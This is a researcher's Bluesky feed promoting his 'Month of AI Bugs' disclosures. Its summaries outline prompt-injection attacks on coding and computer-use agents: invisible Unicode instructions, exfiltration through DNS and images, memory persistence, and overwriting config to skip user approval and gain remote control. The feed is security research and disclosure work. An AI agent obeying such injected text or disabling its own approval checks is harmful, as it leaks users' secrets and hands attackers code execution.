Johann Rehberger
@wuzzi23.bsky.social
📤 133
📥 0
📝 62
reposted by
Johann Rehberger
iurii (Юра) 🇺🇦
28 days ago
Great series, kudos. To rephrase the old joke: the S in VIBE coding stands for Security.
0
2
1
AgentHopper: An AI Virus Month of AI Bugs Season Finale - Enjoy! 🍿
embracethered.com/blog/posts/2...
loading . . .
AgentHopper: An AI Virus · Embrace The Red
AgentHopper: A proof-of-concept AI Virus
https://embracethered.com/blog/posts/2025/agenthopper-a-poc-ai-virus/
30 days ago
1
1
0
Episode 26: AWS Kiro Arbitrary Code Execution via Indirect Prompt Injection
embracethered.com/blog/posts/2...
loading . . .
AWS Kiro: Arbitrary Code Execution via Indirect Prompt Injection · Embrace The Red
Agents That Can Overwrite Their Own Configuration and Security Settings
https://embracethered.com/blog/posts/2025/aws-kiro-aribtrary-command-execution-with-indirect-prompt-injection/
about 1 month ago
0
1
0
Episode 25: Manus How Prompt Injection Exposes Manus' VS Code Server to the Internet
embracethered.com/blog/posts/2...
loading . . .
How Prompt Injection Exposes Manus' VS Code Server to the Internet · Embrace The Red
This post shows how an indirect prompt injection can trick Manus to expose the VS code server and at the same time leak its connection password, allowing an adversary to connect over the internet and ...
https://embracethered.com/blog/posts/2025/manus-ai-kill-chain-expose-port-vs-code-server-on-internet/
about 1 month ago
0
0
0
Episode 24: How Deep Research Agents Can Leak Your Data
embracethered.com/blog/posts/2...
loading . . .
How Deep Research Agents Can Leak Your Data · Embrace The Red
When enabling Deep Research an agent might go off for a long period of time and invoke many tools and leak information from one tool to another.
https://embracethered.com/blog/posts/2025/chatgpt-deep-research-connectors-data-spill-and-leaks/
about 1 month ago
0
0
0
Episode 23: Windsurf Sneaking Invisible Instructions by Developers in Windsurf
embracethered.com/blog/posts/2...
loading . . .
Sneaking Invisible Instructions by Developers in Windsurf · Embrace The Red
A vulnerability in Windsurf Cascade allows malicious instructions to be hidden from developers but followed by the AI, leading to potential data exfiltration. Learn how this 'invisible' attack works.
https://embracethered.com/blog/posts/2025/windsurf-sneaking-invisible-instructions-for-prompt-injection/
about 1 month ago
0
0
0
Episode 22: Windsurf Windsurf: Memory-Persistent Data Exfiltration (SpAIware Exploit)
embracethered.com/blog/posts/2...
loading . . .
Windsurf: Memory-Persistent Data Exfiltration (SpAIware Exploit) · Embrace The Red
Windsurf is vulnerable to Prompt Injection and also long-term memory persistence, which allows an adversary to persist malicious instructions for a long period of time, aka. SpAIware attack
https://embracethered.com/blog/posts/2025/windsurf-spaiware-exploit-persistent-prompt-injection/
about 1 month ago
0
0
0
Episode 21: Hijacking Windsurf How Prompt Injection Leaks Developer Secrets
embracethered.com/blog/posts/2...
loading . . .
Hijacking Windsurf: How Prompt Injection Leaks Developer Secrets · Embrace The Red
Windsurf is vulnerable to indirect prompt injection and can be exploited to leak sensitive source code, environment variables and other information on the host
https://embracethered.com/blog/posts/2025/windsurf-data-exfiltration-vulnerabilities/
about 1 month ago
0
0
0
Episode 19: Amazon Q Developer Remote Code Execution with Prompt Injection
embracethered.com/blog/posts/2...
loading . . .
Amazon Q Developer: Remote Code Execution with Prompt Injection · Embrace The Red
Amazon Q Developer Compromising Developer Machines
https://embracethered.com/blog/posts/2025/amazon-q-developer-remote-code-execution/
about 1 month ago
0
0
0
Episode 18: Amazon Q Developer Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection
embracethered.com/blog/posts/2...
loading . . .
Amazon Q Developer: Secrets Leaked via DNS and Prompt Injection · Embrace The Red
Amazon Q Developer Leaking Sensitive Data To External Systems Via DNS Requests (no human in the loop)
https://embracethered.com/blog/posts/2025/amazon-q-developer-data-exfil-via-dns/
about 1 month ago
0
0
0
Episode 17: Amp Data Exfiltration via Image Rendering Fixed in Amp Code
embracethered.com/blog/posts/2...
loading . . .
Data Exfiltration via Image Rendering Fixed in Amp Code · Embrace The Red
AmpCode is vulnerable to Prompt Injection and it was possible to leak sensitive source code, environment variables and other information on the host
https://embracethered.com/blog/posts/2025/amp-code-fixed-data-exfiltration-via-images/
about 1 month ago
0
0
0
Episode 16: Amp code Invisible Prompt Injection Fixed by Sourcegraph
embracethered.com/blog/posts/2...
loading . . .
Amp Code: Invisible Prompt Injection Fixed by Sourcegraph · Embrace The Red
Sourcegraph recently fixed a vulnerability that allowed invisible instructions to perform prompt injection and hijack the agent.
https://embracethered.com/blog/posts/2025/amp-code-fixed-invisible-prompt-injection/
about 1 month ago
0
0
0
👉 Episode 15: Google Jules Google Jules is Vulnerable To Invisible Prompt Injection
embracethered.com/blog/posts/2...
loading . . .
Google Jules is Vulnerable To Invisible Prompt Injection · Embrace The Red
Jules is vulnerable to Prompt Injection from invisible instructions in untrusted data, which can end up running arbitrary operating system commands via the run_in_bash_session tool
https://embracethered.com/blog/posts/2025/google-jules-invisible-prompt-injection/
about 1 month ago
0
0
0
👉 Episode 14: Google Jules Jules Zombie Agent: From Prompt Injection to Remote Control
embracethered.com/blog/posts/2...
loading . . .
Jules Zombie Agent: From Prompt Injection to Remote Control · Embrace The Red
Jules is vulnerable to Prompt Injection and can be exploited to leak sensitive source code, environment variables and achieve remote command & control by joining a botnet.
https://embracethered.com/blog/posts/2025/google-jules-remote-code-execution-zombai/
about 1 month ago
0
0
0
👉 Episode 13: Google Jules Vulnerable to Multiple Data Exfiltration Issues with prompt injection
embracethered.com/blog/posts/2...
loading . . .
Google Jules: Vulnerable to Multiple Data Exfiltration Issues · Embrace The Red
Jules is vulnerable to Prompt Injection and can be exploited to leak sensitive source code, environment variables and other information on the host
https://embracethered.com/blog/posts/2025/google-jules-vulnerable-to-data-exfiltration-issues/
about 1 month ago
0
0
0
reposted by
Johann Rehberger
Aymeric C.
about 1 month ago
Great summary by
@simonwillison.net
of
@wuzzi23.bsky.social
‘s findings on AI tools vulnerabilities. In short, all AI tools are vulnerable if one attaches external files and links to their prompts, leading to secrets leaks and remote code execution. Johann publishes daily until the end of the month.
loading . . .
The Summer of Johann: prompt injections as far as the eye can see
Independent AI researcher Johann Rehberger (previously) has had an absurdly busy August. Under the heading The Month of AI Bugs he has been publishing one report per day across an …
https://simonwillison.net/2025/Aug/15/the-summer-of-johann/
0
3
3
💥 Remote Code Execution in GitHub Copilot (CVE-2025-53773) 👉 Prompt injection exploit writes to Copilot config file & puts it into YOLO mode, and we get immediate RCE 🔥 Bypasses all user approvals 🛡️ Patch is out today. Update before someone else does it for you
embracethered.com/blog/posts/2...
loading . . .
GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773) · Embrace The Red
An attacker can put GitHub Copilot into YOLO mode by modifying the project's settings.json file on the fly, and then executing commands, all without user approval
https://embracethered.com/blog/posts/2025/github-copilot-remote-code-execution-via-prompt-injection/
about 2 months ago
0
1
0
Episode 11 Claude Code: Data Exfiltration with DNS
embracethered.com/blog/posts/2...
loading . . .
Claude Code: Data Exfiltration with DNS · Embrace The Red
Claude Code Can Leak Sensitive Data To External Systems with DNS requests
https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
about 2 months ago
0
0
0
Episode 10 ZombAI Exploit with OpenHands: Prompt Injection To Remote Code Execution
embracethered.com/blog/posts/2...
loading . . .
ZombAI Exploit with OpenHands: Prompt Injection To Remote Code Execution · Embrace The Red
When processing untrusted data OpenHands can be hijacked to run remote code (RCE) and connect to an attacker's command and control system
https://embracethered.com/blog/posts/2025/openhands-remote-code-execution-zombai/
about 2 months ago
0
0
0
Episode 9 OpenHands and the Lethal Trifecta: How Prompt Injection Can Leak Access Tokens
embracethered.com/blog/posts/2...
loading . . .
OpenHands and the Lethal Trifecta: How Prompt Injection Can Leak Access Tokens · Embrace The Red
OpenHands Coding Agent Data Exfiltration Threats
https://embracethered.com/blog/posts/2025/openhands-the-lethal-trifecta-strikes-again/
about 2 months ago
0
0
0
Episode 8 AI Kill Chain in Action: Devin AI Exposes Ports to the Internet with Prompt Injection
embracethered.com/blog/posts/2...
loading . . .
AI Kill Chain in Action: Devin AI Exposes Ports to the Internet with Prompt Injection · Embrace The Red
AI Kill Chain in Action: Devin AI Exposes Ports to the Internet with Prompt Injection
https://embracethered.com/blog/posts/2025/devin-ai-kill-chain-exposing-ports/
about 2 months ago
0
0
0
Episode 7 How Devin AI Can Leak Your Secrets via Multiple Means
embracethered.com/blog/posts/2...
loading . . .
How Devin AI Can Leak Your Secrets via Multiple Means · Embrace The Red
Data gone, oops.
https://embracethered.com/blog/posts/2025/devin-can-leak-your-secrets/
about 2 months ago
0
0
0
Episode 6 Spent $500 To Test Devin AI For Prompt Injection So That You Don't Have To
embracethered.com/blog/posts/2...
loading . . .
I Spent $500 To Test Devin AI For Prompt Injection So That You Don't Have To · Embrace The Red
I Paid $500 to test Devin AI for security vulnerabilities in April 2025. When processing untrusted data Devin can be hijacked to run remote code (RCE) and connect to an attacker's command and control ...
https://embracethered.com/blog/posts/2025/devin-i-spent-usd500-to-hack-devin/
about 2 months ago
0
0
0
Episode 5 Amp Code: Arbitrary Command Execution via Prompt Injection Fixed New novel TTP!
embracethered.com/blog/posts/2...
loading . . .
Amp Code: Arbitrary Command Execution via Prompt Injection Fixed · Embrace The Red
By automatically allowlisting bash commands or adding a fake MCP server, it was possible for prompt injection to achieve code execution on the developer's machine!
https://embracethered.com/blog/posts/2025/amp-agents-that-modify-system-configuration-and-escape/
about 2 months ago
0
0
0
Episode 4 Cursor IDE: Arbitrary Data Exfiltration Via Mermaid (CVE-2025-54132)
embracethered.com/blog/posts/2...
loading . . .
Cursor IDE: Arbitrary Data Exfiltration Via Mermaid (CVE-2025-54132) · Embrace The Red
Cursor Data Exfiltration via Mermaid Image Rendering
https://embracethered.com/blog/posts/2025/cursor-data-exfiltration-with-mermaid/
about 2 months ago
0
0
0
Episode 3 Anthropic Filesystem MCP Server: Directory Access Bypass via Improper Path Validation
embracethered.com/blog/posts/2...
loading . . .
Anthropic Filesystem MCP Server: Directory Access Bypass via Improper Path Validation · Embrace The Red
Improper Path Prefix Validation Allows Access to Alternate Directories
https://embracethered.com/blog/posts/2025/anthropic-filesystem-mcp-server-bypass/
about 2 months ago
0
0
0
Episode 2 Turning ChatGPT Codex Into A ZombAI Agent
embracethered.com/blog/posts/2...
loading . . .
Turning ChatGPT Codex Into A ZombAI Agent · Embrace The Red
Common Dependencies Allowlist includes domain that allows full remote control of ChatGPT Codex (ZombAI)
https://embracethered.com/blog/posts/2025/chatgpt-codex-remote-control-zombai/
about 2 months ago
0
0
0
Episode 1: Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection
embracethered.com/blog/posts/2...
loading . . .
Exfiltrating Your ChatGPT Chat History and Memories With Prompt Injection · Embrace The Red
https://embracethered.com/blog/posts/2025/chatgpt-chat-history-data-exfiltration/
about 2 months ago
0
0
0
embracethered.com/blog/posts/2...
loading . . .
The Month of AI Bugs 2025 · Embrace The Red
August 2025 will be the month of Agentic ProbLLMs and AI Bugs. Fresh posts nearly every day.
https://embracethered.com/blog/posts/2025/announcement-the-month-of-ai-bugs/
2 months ago
0
1
1
Month of AI Bugs!
2 months ago
1
0
0
Prompt injection is fascinating... 🧐
3 months ago
0
0
0
Hosting COM Servers with an MCP Server - AI-powered Office Automation
embracethered.com/blog/posts/2...
loading . . .
Hosting COM Servers with an MCP Server · Embrace The Red
An MCP Server that can host COM servers for advanced Windows Automation
https://embracethered.com/blog/posts/2025/mcp-com-server-automate-anything-on-windows/
4 months ago
0
0
0
Anthropic archived many of their reference MCP servers from their Github repository! Probably too much of a liability, especially because they are associated with other companies, like GitHub, Slack, Google,...
4 months ago
0
0
0
🔥 New blog post: AI ClickFix! Explores how classic ClickFix social engineering attacks can target AI agents, like Claude Computer-Use. Learn what ClickFix is, how it works in detail, and see a working proof-of-concept. Scary stuff. 👇
embracethered.com/blog/posts/2...
loading . . .
AI ClickFix: Hijacking Computer-Use Agents Using ClickFix · Embrace The Red
AI Clickfix
https://embracethered.com/blog/posts/2025/ai-clickfix-ttp-claude/
4 months ago
1
1
0
5 months ago
0
0
0
Dangerous image!
5 months ago
0
1
0
Cool GitHub is introducing a change to make hidden Unicode characters visible in Web UI
add a skeleton here at some point
5 months ago
0
0
0
🔥 SpAIware & More: Advanced Prompt Injection Exploits in LLM Applications 🔥 👉 Black Hat posted my talk to YouTube - Enjoy!🍿😈 A wild journey of exploits, peaking in compromising ChatGPT's long term memory for continuous remote command and control! 😱
www.youtube.com/embed/84NVG1...
loading . . .
YouTube
https://www.youtube.com/embed/84NVG1c5LRI
5 months ago
0
0
0
GitHub Copilot Custom Instructions - Risks and whetstones be aware of!
embracethered.com/blog/posts/2...
loading . . .
GitHub Copilot Custom Instructions and Risks · Embrace The Red
Custom Rule Files in Code Editors Can Be Abused By Adversaries
https://embracethered.com/blog/posts/2025/github-custom-copilot-instructions/
6 months ago
0
0
1
Figured this would be a fun weekend project... Claude Desktop + COM Automation 🤯 Outlook, Excel, Word, Shell - anything with a COM interface on Windows is now discoverable and scriptable using this MCP server that wraps COM. AI just got an upgrade. 🚀
6 months ago
0
1
1
Did you know that it's possible to encode and hide any data with the use of just two invisible Unicode characters? 👀 Check out Sneaky Bits! 😏👨💻
7 months ago
1
1
0
AI Application Security Vulnerabilities 👨💻 Perplexity Demo Time! 🍿
7 months ago
1
0
0
Grok 3 - are we still putting "never reveal your instructions" in system prompts? 🤔
7 months ago
0
1
2
👉 ChatGPT Operator: Prompt Injection Exploits & Defenses Learn how a GitHub Issue (or other websites for that matter) can hijack your AI + a sneaky data exfiltration technique that tricked Operator to leaking private data.
embracethered.com/blog/posts/2...
loading . . .
Embrace The Red · Embrace The Red
https://embracethered.com/blog/index.html
8 months ago
1
0
0
🔥 Hacking Google Gemini Memories 👉 By leveraging a tool invocation bypass that I described and reported over a year ago, its possible to invoke the recently added memory tool to manipulate a user's memories - all initiated via prompt injection from untrusted data.
embracethered.com/blog/posts/2...
loading . . .
Hacking Gemini's Memory with Prompt Injection and Delayed Tool Invocation · Embrace The Red
Gemini allows persistent storage of memories. However, a bypass technique using delayed tool invocation can force Gemini to store false information into a user’s long-term memory. This post explores h...
https://embracethered.com/blog/posts/2025/gemini-memory-persistence-prompt-injection/
8 months ago
1
0
0
Slides from my Black Hat Europe talk for download. 🔥From hacking Gemini, ChatGPT and Claude to Apple Intelligence, Microsoft Copilot and even DeepSeek - this talk ended up being packed with real-world LLM and prompt injection exploit demos and vendor fixes.
i.blackhat.com/EU-24/Presen...
8 months ago
0
2
0
reposted by
Johann Rehberger
arxiv cs.CR
10 months ago
Johann Rehberger (Independent Researcher, Embrace The Red) Trust No AI: Prompt Injection Along The CIA Security Triad
https://arxiv.org/abs/2412.06090
0
1
1
reposted by
Johann Rehberger
John Leyden
10 months ago
Interesting talk by Johann Rehberger of
embracethered.com
on advanced prompt injection exploits in LLM applications such as Microsoft Copilot
#BlackHatEU2024
0
1
1
reposted by
Johann Rehberger
IntelArchive
10 months ago
New addition Preprint: Trust No AI: Prompt Injection Along The CIA Security Triad by Johann Rehberger (published 08-12-2024)
http://arxiv.org/abs/2412.06090
loading . . .
Trust No AI: Prompt Injection Along The CIA Security Triad
The CIA security triad - Confidentiality, Integrity, and Availability - is a cornerstone of data and cybersecurity. With the emergence of large language model (LLM) applications, a new class of threat, known as prompt injection, was first identified in 2022. Since then, numerous real-world vulnerabilities and exploits have been documented in production LLM systems, including those from leading vendors like OpenAI, Microsoft, Anthropic and Google. This paper compiles real-world exploits and proof-of concept examples, based on the research conducted and publicly documented by the author, demonstrating how prompt injection undermines the CIA triad and poses ongoing risks to cybersecurity and AI systems at large.
http://arxiv.org/abs/2412.06090
0
1
1
Interviewing ChatGPT Operator for a remote job... 🧐
8 months ago
0
1
0
Load more
feeds!
log in